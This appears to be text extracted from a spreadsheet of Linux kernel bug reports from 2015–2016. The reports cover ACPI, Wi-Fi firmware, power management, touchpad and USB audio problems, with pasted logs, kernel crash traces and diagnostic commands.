Sep 18 11:00:33 habanero kernel: Disabling non-boot CPUs ... Sep 18 11:00:33 habanero kernel: intel_pstate CPU 1 exiting Sep 18 11:00:33 habanero kernel: kvm: disabling virtualization on CPU1 Sep 18 11:00:33 habanero kernel: smpboot: CPU 1 is now offline Sep 18 11:00:33 habanero kernel: intel_pstate CPU 2 exiting Sep 18 11:00:33 habanero kernel: kvm: disabling virtualization on CPU2 Sep 18 11:00:33 habanero kernel: smpboot: CPU 2 is now offline Sep 18 11:00:33 habanero kernel: intel_pstate CPU 3 exiting Sep 18 11:00:33 habanero kernel: kvm: disabling virtualization on CPU3 Sep 18 11:00:33 habanero kernel: smpboot: CPU 3 is now offline Sep 18 11:00:33 habanero kernel: PM: Creating hibernation image: Sep 18 11:00:33 habanero kernel: PM: Need to copy 304187 pages Sep 18 11:00:33 habanero kernel: PM: Normal pages needed: 304187 + 1024, available pages: 2769012 Sep 18 11:00:33 habanero kernel: Enabling non-boot CPUs ... Sep 18 11:00:33 habanero kernel: x86: Booting SMP configuration: Sep 18 11:00:33 habanero kernel: smpboot: Booting Node 0 Processor 1 APIC 0x1 Sep 18 11:00:33 habanero kernel: kvm: enabling virtualization on CPU1 Sep 18 11:00:33 habanero kernel: cache: parent cpu1 should not be sleeping Sep 18 11:00:33 habanero kernel: CPU1 is up Sep 18 11:00:33 habanero kernel: smpboot: Booting Node 0 Processor 2 APIC 0x2 Sep 18 11:00:33 habanero kernel: kvm: enabling virtualization on CPU2 Sep 18 11:00:33 habanero kernel: cache: parent cpu2 should not be sleeping Sep 18 11:00:33 habanero kernel: CPU2 is up Sep 18 11:00:33 habanero kernel: smpboot: Booting Node 0 Processor 3 APIC 0x3 Sep 18 11:00:33 habanero kernel: kvm: enabling virtualization on CPU3 Sep 18 11:00:33 habanero kernel: cache: parent cpu3 should not be sleeping Sep 18 11:00:33 habanero kernel: CPU3 is up Sep 18 11:00:33 habanero kernel: PM: noirq restore of devices complete after 10.853 msecs Sep 18 11:00:33 habanero kernel: PM: early restore of devices complete after 10.510 msecs Sep 18 11:00:33 habanero kernel: usb usb1: root hub lost power or was reset Sep 18 11:00:33 habanero kernel: usb usb2: root hub lost power or was reset Sep 18 11:00:33 habanero kernel: usb usb3: root hub lost power or was reset Sep 18 11:00:33 habanero kernel: rtc_cmos 00:02: System wakeup disabled by ACPI Sep 18 11:00:33 habanero kernel: sd 0:0:0:0: [sda] Starting disk Sep 18 11:00:33 habanero kernel: sd 2:0:0:0: [sdb] Starting disk Sep 18 11:00:33 habanero kernel: ehci-pci 0000:00:1d.0: cache line size of 64 is not supported Sep 18 11:00:33 habanero kernel: ata3: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 11:00:33 habanero kernel: ata1: SATA link up 6.0 Gbps (SStatus 133 SControl 300) Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 11:00:33 habanero kernel: ata3.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata3.00: configured for UDMA/133 Sep 18 11:00:33 habanero kernel: usb 3-1: reset high-speed USB device number 2 using ehci-pci Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 11:00:33 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd ef/02:00:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd f5/00:00:00:00:00:a0 (SECURITY FREEZE LOCK) filtered out Sep 18 11:00:33 habanero kernel: ata1.00: ACPI cmd ef/10:09:00:00:00:a0 (SET FEATURES) succeeded Sep 18 11:00:33 habanero kernel: ata1.00: supports DRM functions and may not be fully accessible Sep 18 11:00:33 habanero kernel: ata1.00: disabling queued TRIM support Sep 18 11:00:33 habanero kernel: ata1.00: configured for UDMA/133 Sep 18 11:00:33 habanero kernel: usb 1-8: reset high-speed USB device number 4 using xhci_hcd Sep 18 11:00:33 habanero kernel: usb 1-6: reset full-speed USB device number 3 using xhci_hcd Sep 18 11:00:33 habanero kernel: psmouse serio1: synaptics: queried max coordinates: x [..5676], y [..4758] Sep 18 11:00:33 habanero kernel: psmouse serio1: synaptics: queried min coordinates: x [1266..], y [1096..] Sep 18 11:00:33 habanero kernel: usb 1-1: reset full-speed USB device number 2 using xhci_hcd Sep 18 11:00:33 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 11:00:33 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 11:00:33 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 11:00:33 habanero kernel: iwlwifi 0000:03:00.0: L1 Enabled - LTR Enabled Sep 18 11:00:33 habanero kernel: PM: restore of devices complete after 1336.471 msecs Sep 18 11:00:33 habanero kernel: PM: Image restored successfully. Sep 18 11:00:33 habanero kernel: PM: Basic memory bitmaps freed Sep 18 11:00:33 habanero kernel: Restarting tasks ... done. Sep 18 11:00:41 habanero kernel: wlp3s0: authenticate with 54:a0:50:76:f4:70 Sep 18 11:00:41 habanero kernel: wlp3s0: send auth to 54:a0:50:76:f4:70 (try 1/3) Sep 18 11:00:41 habanero kernel: wlp3s0: authenticated Sep 18 11:00:41 habanero kernel: wlp3s0: associate with 54:a0:50:76:f4:70 (try 1/3) Sep 18 11:00:41 habanero kernel: wlp3s0: RX AssocResp from 54:a0:50:76:f4:70 (capab=0x411 status=0 aid=1) Sep 18 11:00:41 habanero kernel: wlp3s0: associated Sep 18 11:03:07 habanero matt[3274]: CUSTOM: starting CORE pm_test Sep 18 11:03:07 habanero kernel: PM: Hibernation mode set to 'shutdown' Sep 18 11:03:15 habanero kernel: PM: Syncing filesystems ... done. Sep 18 11:03:15 habanero kernel: Freezing user space processes ... (elapsed 0.001 seconds) done. Sep 18 11:03:15 habanero kernel: PM: Marking nosave pages: [mem 0x00000000-0x00000fff] Sep 18 11:03:15 habanero kernel: PM: Marking nosave pages: [mem 0x0009d000-0x000fffff] Sep 18 11:03:15 habanero kernel: PM: Marking nosave pages: [mem 0x10000000-0x1000afff] Sep 18 11:03:15 habanero kernel: PM: Marking nosave pages: [mem 0x90605000-0xffffffff] Sep 18 11:03:15 habanero kernel: PM: Basic memory bitmaps created Sep 18 11:03:15 habanero kernel: PM: Preallocating image memory... done (allocated 328546 pages) Sep 18 11:03:15 habanero kernel: PM: Allocated 1314184 kbytes in 1.93 seconds (680.92 MB/s) Sep 18 11:03:15 habanero kernel: Freezing remaining freezable tasks ... (elapsed 0.000 seconds) done. Sep 18 11:03:15 habanero kernel: Suspending console(s) (use no_console_suspend to debug) Sep 18 11:03:15 habanero kernel: wlp3s0: deauthenticating from 54:a0:50:76:f4:70 by local choice (Reason:</t>
  </si>
  <si>
    <t>AcpiEnable failed</t>
  </si>
  <si>
    <t>4.3.0-rc3</t>
  </si>
  <si>
    <t>2015-10-02 04:34 UTC</t>
  </si>
  <si>
    <t>Meelis Roos</t>
  </si>
  <si>
    <t>2015-10-22 02:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 189271 [details] Full dmesg In 4.3 merge, an ACPI patch was merged that breaks ACPI enabling on one of my PC-s. It's a Pentium III, i815 chipset, Packard Bell branded BIOS. I bisected it to the following commit: 8ec3f459073e67e5c6d78507dec693064b3040a2 is the first bad commit commit 8ec3f459073e67e5c6d78507dec693064b3040a2 Author: Lv Zheng &lt;lv.zheng@intel.com&gt; Date: Tue Aug 25 10:29:01 2015 +0800 ACPICA: Tables: Fix global table list issues by removing fixed table indexes ACPICA commit c0b38b4c3982c2336ee92a2a14716107248bd941 The fixed table indexes leave holes in the global table list: 1. One hole can be seen when there is only 1 FACS provided by the BIOS. 2. Tow holes can be seen when it is a reduced hardware platform. The holes do not break OSPMs but have broken ACPI debugger "tables" command. Also the "fixed table indexes" mechanism may make the descriptors of the standard tables installed earlier than DSDT to be overwritten by the descriptors of the fixed tables. For example, FACP disappears from the global table list after DSDT is installed. This patch fixes all above issues by removing the "fixed table indexes" mechanism which is too complicated to be maintained in a regression safe manner. After removal, the table loader will determine the indexes of the fixed tables. Lv Zheng. Link: https://github.com/acpica/acpica/commit/c0b38b4c Signed-off-by: Lv Zheng &lt;lv.zheng@intel.com&gt; Signed-off-by: Bob Moore &lt;robert.moore@intel.com&gt; Signed-off-by: Rafael J. Wysocki &lt;rafael.j.wysocki@intel.com&gt; :040000 040000 0c3bbd0eca80e79fcf6f265cfc98f38b51b3a807 46d34d3ce537aff081694b0ad511a5ae00771b86 M drivers</t>
  </si>
  <si>
    <t>iwlwifi: 3160 Dual Band AC: ASSERT 8FE</t>
  </si>
  <si>
    <t>4.2.2-1-ARCH</t>
  </si>
  <si>
    <t>2015-10-10 14:31 UTC</t>
  </si>
  <si>
    <t>jb</t>
  </si>
  <si>
    <t>2015-10-14 16:45 UTC</t>
  </si>
  <si>
    <t>Created attachment 189901 [details] journalctl There are error messages at boot time. $ journalctl ... Oct 10 10:36:33 myhost kernel: iwlwifi 0000:04:00.0: Direct firmware load for iwlwifi-3160-15.ucode failed with error -2 Oct 10 10:36:33 myhost kernel: iwlwifi 0000:04:00.0: Direct firmware load for iwlwifi-3160-14.ucode failed with error -2 Oct 10 10:36:33 myhost kernel: iwlwifi 0000:04:00.0: loaded firmware version 25.30.13.0 op_mode iwlmvm Oct 10 10:36:33 myhost kernel: iwlwifi 0000:04:00.0: Detected Intel(R) Dual Band Wireless AC 3160, REV=0x164 ... ct 10 11:34:53 myhost kernel: iwlwifi 0000:04:00.0: Microcode SW error detected. Restarting 0x2000000. Oct 10 11:34:53 myhost kernel: iwlwifi 0000:04:00.0: CSR values: Oct 10 11:34:53 myhost kernel: iwlwifi 0000:04:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) ... linux-firmware package contents: ... linux-firmware /usr/lib/firmware/iwlwifi-3160-10.ucode linux-firmware /usr/lib/firmware/iwlwifi-3160-12.ucode linux-firmware /usr/lib/firmware/iwlwifi-3160-13.ucode linux-firmware /usr/lib/firmware/iwlwifi-3160-7.ucode linux-firmware /usr/lib/firmware/iwlwifi-3160-8.ucode linux-firmware /usr/lib/firmware/iwlwifi-3160-9.ucode ... $ lsmod |grep iwl iwlmvm 229376 0 mac80211 651264 1 iwlmvm iwlwifi 172032 1 iwlmvm cfg80211 466944 3 iwlwifi,mac80211,iwlmvm led_class 16384 3 iwlmvm,thinkpad_acpi,input_leds</t>
  </si>
  <si>
    <t>mac80211: Log spam "wlan0: Limiting TX power to" - MWG100250701</t>
  </si>
  <si>
    <t>2015-10-15 22:43 UTC</t>
  </si>
  <si>
    <t>2015-11-24 07:53 UTC</t>
  </si>
  <si>
    <t>I get this in my dmesg: [52464.041250] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52464.707059] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.168531] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.203857] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.247743] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.257956] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.268810] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb [52465.306069] wlan0: Limiting TX power to 23 (23 - 0) dBm as advertised by 00:0c:e6:9a:26:bb As you can see, I get about 6 or 7 lines of this type every second. This somewhat limits the usefulness of "dmesg" as it now only reaches back a few minutes. In addition, while easily compressed, do fill up my disk (by way of syslog)</t>
  </si>
  <si>
    <t>there exists a wrong return value of function ezusb_probe() when alloc_orinocodev() fails</t>
  </si>
  <si>
    <t>2015-10-19 06:47 UTC</t>
  </si>
  <si>
    <t>2015-10-19 15:17 UTC</t>
  </si>
  <si>
    <t>In function ezusb_probe() at drivers/net/wireless/orinoco/orinoco_usb.c:1561, if alloc_orinocodev() at line 1574 fails, ezusb_probe() will return 0 indicating success, because variable 'retval' is assigned 0 at line 1571. But, function ezusb_probe() should propagate the error and return the error to its caller functions. So, when ezusb_probe() fails, the return value 0 is wrong. The related code snippets in ezusb_probe are as following. ezusb_probe @@ drivers/net/wireless/orinoco/orinoco_usb.c:1561 1561 static int ezusb_probe(struct usb_interface *interface, 1562 const struct usb_device_id *id) 1563 { .... 1571 int retval = 0; 1572 int i; 1573 1574 priv = alloc_orinocodev(sizeof(*upriv), &amp;udev-&gt;dev, 1575 ezusb_hard_reset, NULL); 1576 if (!priv) { 1577 err("Couldn't allocate orinocodev"); 1578 goto exit; 1579 } ... 1712 exit: 1713 if (fw_entry) { 1714 firmware.code = NULL; 1715 firmware.size = 0; 1716 release_firmware(fw_entry); 1717 } 1718 usb_set_intfdata(interface, upriv); 1719 return retval; 1720 }</t>
  </si>
  <si>
    <t>mwait_play_dead faults on invalid monitor address</t>
  </si>
  <si>
    <t>2015-10-20 19:10 UTC</t>
  </si>
  <si>
    <t>Varun Koyyalagunta</t>
  </si>
  <si>
    <t>2016-08-01 03:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 190641 [details] call graph S4 resume will fail and reboot about 1 out of 100 times. On the Via Nano, we narrowed it down to a double fault in mwait_play_dead(). An Intel Haswell appears to fail similarly, but we did not narrow it all the way down. from smpboot.c: static inline void mwait_play_dead(void) ... mwait_ptr = &amp;current_thread_info()-&gt;flags; .. while (1) { clflush(mwait_ptr); //** &lt;--- double fault occurs here **// mb(); __monitor(mwait_ptr, 0, 0); mb(); __mwait(eax, 0); ... } } The double fault occurs when the boot cpu is managing the resume (resume_target_kernel()) and the non-boot cpus are in the above loop (from disable_nonboot_cpus()). If a "spurious"-wakeup out of the mwait happens, the non-boot cpu may tablewalk for the mwait_ptr again, but it appears that mwait_ptr is no longer present in the page tables (the boot cpu is in set_up_temporary_mapping() during this time). This causes a pagefault-pagefault-doublefault. A possible fix is to have mwait_ptr point to somewhere else that stays paged during the resume process. One experiment where we had `mwait_ptr = mwait_play_dead` appeared to fix it. However, that is probably not ideal for performance, as it is pointing to code, and all the cpus will clflush that same address. Attached is a drawn call graph of the observed failure case.</t>
  </si>
  <si>
    <t>Surface 3 Lid Switch Method parse/execution failed</t>
  </si>
  <si>
    <t>4.3.0-rc6+acpi/bleeding-edge 6368074ac</t>
  </si>
  <si>
    <t>2015-10-24 19:51 UTC</t>
  </si>
  <si>
    <t>Stephen Just</t>
  </si>
  <si>
    <t>2016-02-01 20:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 191021 [details] dmesg until failure On the Microsoft Surface 3, when you fold the type cover over the screen (or "close the lid"), the lid switch state does not change, and an ACPI error is thrown. The lid switch state always reports closed. [root@localhost ~]# cat /proc/acpi/button/lid/LID/state state: closed [ 1130.459896] ACPI Exception: AE_ERROR, Returned by Handler for [GeneralPurposeIo] (20150930/evregion-297) [ 1130.460061] ACPI Error: Method parse/execution failed [\_SB.GPO0._E4C] (Node ffff88013f4b4438), AE_ERROR (20150930/psparse-542) From the DSDT, this is the GPIO event handler that toggles the lid switch state.</t>
  </si>
  <si>
    <t>LID init state - Surface 3 Lid Switch state not properly set at boot</t>
  </si>
  <si>
    <t>2015-10-31 06:28 UTC</t>
  </si>
  <si>
    <t>2016-12-05 03:21 UTC</t>
  </si>
  <si>
    <t>Created attachment 191671 [details] acpidump output On the Surface 3, the state of the lid switch is set to Closed when the computer starts, irrespective of the position of the Surface 3 Type Cover. With the patch from Bug 106571, the lid switch state does correctly update after you "open" or "close" the "lid" of this device, but the initial state is still incorrect. This seems similar to the discussion in http://thread.gmane.org/gmane.linux.acpi.devel/77428 except that I think that this thread was talking about devices with the keyboard cover detached, whereas in this case it is attached. I will attach the acpidump and dmesg (with ec debug enabled) to this issue - hopefully I've collected this correctly.</t>
  </si>
  <si>
    <t>Macbook ACPI EC intermittent boot stalls</t>
  </si>
  <si>
    <t>4.3.0</t>
  </si>
  <si>
    <t>2015-11-04 22:24 UTC</t>
  </si>
  <si>
    <t>Chris Bainbridge</t>
  </si>
  <si>
    <t>2015-12-02 02:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 192131 [details] dmesg.bad.gz It appears that the fix from bug #94651 was not sufficient to completely prevent boot stalls caused by the ACPI EC. I have captured dmesg (with ec.c DEBUG) from an example stall. The dmesg log is annotated with the smb_hc_* calls from sbshc.c and with a stack trace at the end of the stall. If you highlight "smb_hc" you will see the start of each individual call in to the ec code. The dmesg shows a smb_hc_write operation beginning at 0.377764 seconds which causes a stall until 232.4 seconds. Note that, to save space in the dmesg log, I only capture the first 100,000 lines of EC debug output (ec.c appears to be stuck in a loop outputting the same repeated lines thousands of times per second).</t>
  </si>
  <si>
    <t>pstate max_perf_pct is capped at 38 for Skylake CPU and turbo not activates</t>
  </si>
  <si>
    <t>4.4-rc1</t>
  </si>
  <si>
    <t>2015-11-23 20:06 UTC</t>
  </si>
  <si>
    <t>János Illés</t>
  </si>
  <si>
    <t>2016-08-23 02:48 UTC</t>
  </si>
  <si>
    <t>Created attachment 195241 [details] /proc/cpuinfo I have a new ASUS Zenbook with an Intel(R) Core(TM) m7-6Y75 CPU It seems I cannot modify the max_perf_pct above 38 and I think turbo is not activated but no_turbo is 0 yet turbostat never reports higher frequency than 1200MHz but it should go as high as 3100 # cd /sys/devices/system/cpu/intel_pstate/ # cat max_perf_pct 38 # echo 15 &gt; max_perf_pct # cat max_perf_pct 15 # echo 30 &gt; max_perf_pct # cat max_perf_pct 30 # echo 50 &gt; max_perf_pct # cat max_perf_pct 38 # echo 100 &gt; max_perf_pct # cat max_perf_pct 38</t>
  </si>
  <si>
    <t>No touchpad on ASUS Zenbook beacuse i2c loses arbitration</t>
  </si>
  <si>
    <t>4.4-rc6</t>
  </si>
  <si>
    <t>2015-11-28 13:30 UTC</t>
  </si>
  <si>
    <t>2016-04-18 19:56 UTC</t>
  </si>
  <si>
    <t>109211 109241 109281 110331</t>
  </si>
  <si>
    <t>The touchpad on the ASUS Zenbook UX305CA doesn't work because the driver (elan_i2c) fails due to an i2c error. [ 4.054751] i2c_designware i2c_designware.0: i2c_dw_handle_tx_abort: lost arbitration [ 4.054754] i2c_hid i2c-ELAN1000:00: hid_descr_cmd failed [ 4.071952] i2c_designware i2c_designware.0: i2c_dw_handle_tx_abort: lost arbitration [ 4.071955] elan_i2c i2c-ELAN1000:00: writing cmd (0x0005) failed: -11 [ 4.071956] elan_i2c i2c-ELAN1000:00: device reset failed: -11 [ 4.071957] elan_i2c i2c-ELAN1000:00: device initialize failed: -11 [ 4.104790] i2c_designware i2c_designware.0: i2c_dw_handle_tx_abort: lost arbitration [ 4.104794] elan_i2c i2c-ELAN1000:00: writing cmd (0x0005) failed: -11 [ 4.104795] elan_i2c i2c-ELAN1000:00: device reset failed: -11 [ 4.104796] elan_i2c i2c-ELAN1000:00: device initialize failed: -11 [ 4.140533] i2c_designware i2c_designware.0: i2c_dw_handle_tx_abort: lost arbitration [ 4.140536] elan_i2c i2c-ELAN1000:00: writing cmd (0x0005) failed: -11 [ 4.140537] elan_i2c i2c-ELAN1000:00: device reset failed: -11 [ 4.140538] elan_i2c i2c-ELAN1000:00: device initialize failed: -11 [ 4.185068] elan_i2c: probe of i2c-ELAN1000:00 failed with error -11</t>
  </si>
  <si>
    <t>[Samsung NP530U4E-K02PL] Cannot change backlight</t>
  </si>
  <si>
    <t>4.4.0-040400rc3-generic</t>
  </si>
  <si>
    <t>2015-12-07 01:18 UTC</t>
  </si>
  <si>
    <t>adam bk</t>
  </si>
  <si>
    <t>2016-01-14 06:20 UTC</t>
  </si>
  <si>
    <t>Created attachment 196491 [details] acpidump output It is not possible to change screen backlight. A workaround is to add a flag acpi_osi=</t>
  </si>
  <si>
    <t>boot hang unless intel_idle.max_cstate=7 - Intel i7 6700HQ (Skylake-H),</t>
  </si>
  <si>
    <t>4.4-rc5</t>
  </si>
  <si>
    <t>2015-12-08 14:42 UTC</t>
  </si>
  <si>
    <t>Ludovic Magerand</t>
  </si>
  <si>
    <t>2016-08-04 12:07 UTC</t>
  </si>
  <si>
    <t>Created attachment 196761 [details] Kernel configuration Got a new MSI laptop after my previous one died, it's a GE72 6QF and it comes with a Intel i7 6700HQ processor which seems to cause trouble to the linux kernel. If I try to boot without any options, the kernel freeze nearly instantly, I just have the time to see a few lines on the screen and everything goes dark, no way to use sysrq to reboot, I have to do a hardware off using the power button. I manage to boot using either one of the acpi=off or nolapic options, corresponding logs are attached. With acpi=off, all the core of my processor seems to be correctly detected and usable, but I'm afraid that as power management is off, cooling might not work correctly and therefor it's not safe to run like this. With nolapic, obviously only one core of the processor is detected and usable, which make the thing really slow, but everything else seems to work correctly. I also tried various other options : * acpi=ht * acpi=strict * acpi=noirq * pci=noacpi * pnpacpi=off * noapic * lapic=notscdeadline * acpi_osi=Linux * acpi_os_name="Windows 2015" (the laptop comes with windows 10) * acpi.power_nocheck=1 Most of them doesn't change anything, with some of them I had a few more lines before the kernel freeze, but it never reach the point where the root filesystem was mounted and so I have no log. There is some options in the bios (which is up to date, I flashed it to the latest version) related to hypthreading and power states, I tried playing with them but it doesn't seems to change anything so I left them to there default values. I had the same kind of problems with my two previous laptop (coming also from MSI) but was able to fix them quickly by editing the DSDT. But it was 4 and 6 years ago and now fixing this seems to be out of my reach (I can't even get the damn DSDT decompiled... some of the acpi tables makes iasl segfault). Here I attache the kernel config, the log files, the output of lspci and dmidecode and the acpi tables. Feel free to ask me to try other configuration or boot options, or providing more log or anything, I will try to provides them as fast as possible (I need the thing to do my work, and I'm pretty inefficient with windows).</t>
  </si>
  <si>
    <t>Intel pstate policy is not coherent with cpufreq sysfs</t>
  </si>
  <si>
    <t>4.4-rc4</t>
  </si>
  <si>
    <t>2015-12-09 02:04 UTC</t>
  </si>
  <si>
    <t>2016-05-16 22:04 UTC</t>
  </si>
  <si>
    <t>For example, grep . /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu2/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu3/cpufreq/scaling_governor:powersave Then change one of the cpu's policy to performance(cpu1): echo performance &gt; /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor grep . /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu1/cpufreq/scaling_governor:performance /sys/devices/system/cpu/cpu2/cpufreq/scaling_governor:powersave /sys/devices/system/cpu/cpu3/cpufreq/scaling_governor:powersave However, other cpus than cpu1 will all be put into performance mode, because internally intel_pstate use a global variable limit to control all the CPUs, so either we should use per policy algorithm for different CPU sets(as cpi-cpufreq does for cpufreq domain in _PSD), or we should synchronize all the CPUs to the same policy once one of the policy has been modified. According to the discussion we prefer the latter solution, so we should do some synchronization in intel_pstate's set_policy callback.</t>
  </si>
  <si>
    <t>Crash at USB audio device removal</t>
  </si>
  <si>
    <t>4.3.3</t>
  </si>
  <si>
    <t>2015-12-15 17:47 UTC</t>
  </si>
  <si>
    <t>2016-07-10 11:21 UTC</t>
  </si>
  <si>
    <t>I have a USB audio stick. I was playing a CD on this audio device with vlc. I removed the device while it was opened by VLC. a. VLC was freezed. b. Kill -9 on it leaves it "Zl" (zombi). c. I closed the X session. d. I noticed the following crash dump on the console: usb 1-2: ep 0x3 - rounding interval to 64 microframes, ep desc says 80 microframes input: SYNIC SYNIC Wireless Audio as /devices/pci0000:00/0000:00:1c.3/0000:05:00.0/usb1/1-2/1-2:1.3/0003:1A1D:0002.0006/input/ input18 hid-generic 0003:1A1D:0002.0006: input,hidraw4: USB HID v1.00 Device [SYNIC SYNIC Wireless Audio] on usb-0000:05:00.0-2/input3 usb 1-2: USB disconnect, device number 3 BUG: unable to handle kernel NULL pointer dereference at 0000000000000190 IP: [&lt;ffffffff815ae7ef&gt;] usb_autopm_put_interface+0xf/0x30 PGD 0 Oops: 0002 [#1] PREEMPT SMP Modules linked in: CPU: 6 PID: 8207 Comm: vlc Not tainted 4.3.3 #10 Hardware name: Acer Aspire 7750G/JE70_HR, BIOS V1.07 03/02/2011 task: ffff880070901700 ti: ffff8800712c8000 task.ti: ffff8800712c8000 RIP: 0010:[&lt;ffffffff815ae7ef&gt;] [&lt;ffffffff815ae7ef&gt;] usb_autopm_put_interface+0xf/0x30 RSP: 0018:ffff8800712cbb10 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff880191123a18 RCX: 000000018040003b RDX: 0000000100721458 RSI: 0000000000000001 RDI: ffff8801c6fcc400 RBP: ffff8800712cbb10 R08: 0000000000000000 R09: ffff8801cf5974c0 R10: ffffea00060c3fc0 R11: ffff8801c8803b00 R12: ffff880191123a10 R13: ffff880071026200 R14: ffff8801c7af7cd0 R15: ffff8800aaaf56e8 FS: 00007fe0647d7700(0000) GS:ffff8801cf580000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000000000000190 CR3: 0000000001c80000 CR4: 00000000000406e0 Stack: ffff8800712cbb20 ffffffff8173bd94 ffff8800712cbb40 ffffffff817461bc ffff8801c6fc9000 ffff8800aaaf5000 ffff8800712cbb50 ffffffff8174621f ffff8800712cbb70 ffffffff816ef58a ffff8801c6fc9000 ffff8800aaaf5000 Call Trace: [&lt;ffffffff8173bd94&gt;] snd_usb_autosuspend+0x14/0x20 [&lt;ffffffff817461bc&gt;] snd_usb_pcm_close.isra.14+0x5c/0x90 [&lt;ffffffff8174621f&gt;] snd_usb_playback_close+0xf/0x20 [&lt;ffffffff816ef58a&gt;] snd_pcm_release_substream.part.36+0x3a/0x90 [&lt;ffffffff816ef6b3&gt;] snd_pcm_release+0xa3/0xb0 [&lt;ffffffff816debb0&gt;] snd_disconnect_release+0xd0/0xe0 [&lt;ffffffff8114d417&gt;] __fput+0x97/0x1d0 [&lt;ffffffff8114d589&gt;] ____fput+0x9/0x10 [&lt;ffffffff8109e452&gt;] task_work_run+0x72/0x90 [&lt;ffffffff81088510&gt;] do_exit+0x280/0xa80 [&lt;ffffffff8108996a&gt;] do_group_exit+0x3a/0xa0 [&lt;ffffffff8109261f&gt;] get_signal+0x1df/0x540 [&lt;ffffffff81040903&gt;] do_signal+0x23/0x620 [&lt;ffffffff8114c128&gt;] ? do_readv_writev+0x128/0x200 [&lt;ffffffff810012e1&gt;] prepare_exit_to_usermode+0x91/0xd0 [&lt;ffffffff810013ba&gt;] syscall_return_slowpath+0x9a/0x120 [&lt;ffffffff817587cd&gt;] ? __sys_recvmsg+0x5d/0x70 [&lt;ffffffff810d2765&gt;] ? ktime_get_ts64+0x45/0xe0 [&lt;ffffffff8115dea0&gt;] ? SyS_poll+0x60/0xf0 [&lt;ffffffff818d2327&gt;] int_ret_from_sys_call+0x25/0x8f Code: 90 00 00 00 48 89 e5 e8 70 b7 f3 ff 5d c3 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 8b 15 18 f8 6c 00 48 8b 47 30 48 89 e5 &lt;48&gt; 89 90 90 01 00 00 f0 ff 8f e0 02 00 00 be 04 00 00 00 48 83 RIP [&lt;ffffffff815ae7ef&gt;] usb_autopm_put_interface+0xf/0x30 RSP &lt;ffff8800712cbb10&gt; CR2: 0000000000000190 ---[ end trace 5475a2d2d7ca39fd ]--- Fixing recursive fault but reboot is needed!</t>
  </si>
  <si>
    <t>iwlwifi: dvm: Cannot suspend PC to RAM with WoWLAN enabled - MWG100252556</t>
  </si>
  <si>
    <t>4.4.0-rc4</t>
  </si>
  <si>
    <t>2015-12-18 21:04 UTC</t>
  </si>
  <si>
    <t>Bogdan Bogush</t>
  </si>
  <si>
    <t>2016-08-02 02:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 197721 [details] dmesg.txt Hi, PC fails suspend to RAM with WoWLAN enabled. After that WiFi stops working. The logs indicate that firmware operation stopped. Scenario: 1. iw phy0 wowlan enable magic-packet 2. echo mem &gt; /sys/power/state 3. Result: PC not suspended. Logs show the warning "Can't start_fw since the HW hasn't been started" HW: Intel(R) Centrino(R) Wireless-N 130 Module: iwlwifi FW version: 18.168.6.1</t>
  </si>
  <si>
    <t>Power/volume button is not handled on Surface Pro 4</t>
  </si>
  <si>
    <t>2015-12-23 20:49 UTC</t>
  </si>
  <si>
    <t>Weng Xuetian</t>
  </si>
  <si>
    <t>2016-01-25 02:28 UTC</t>
  </si>
  <si>
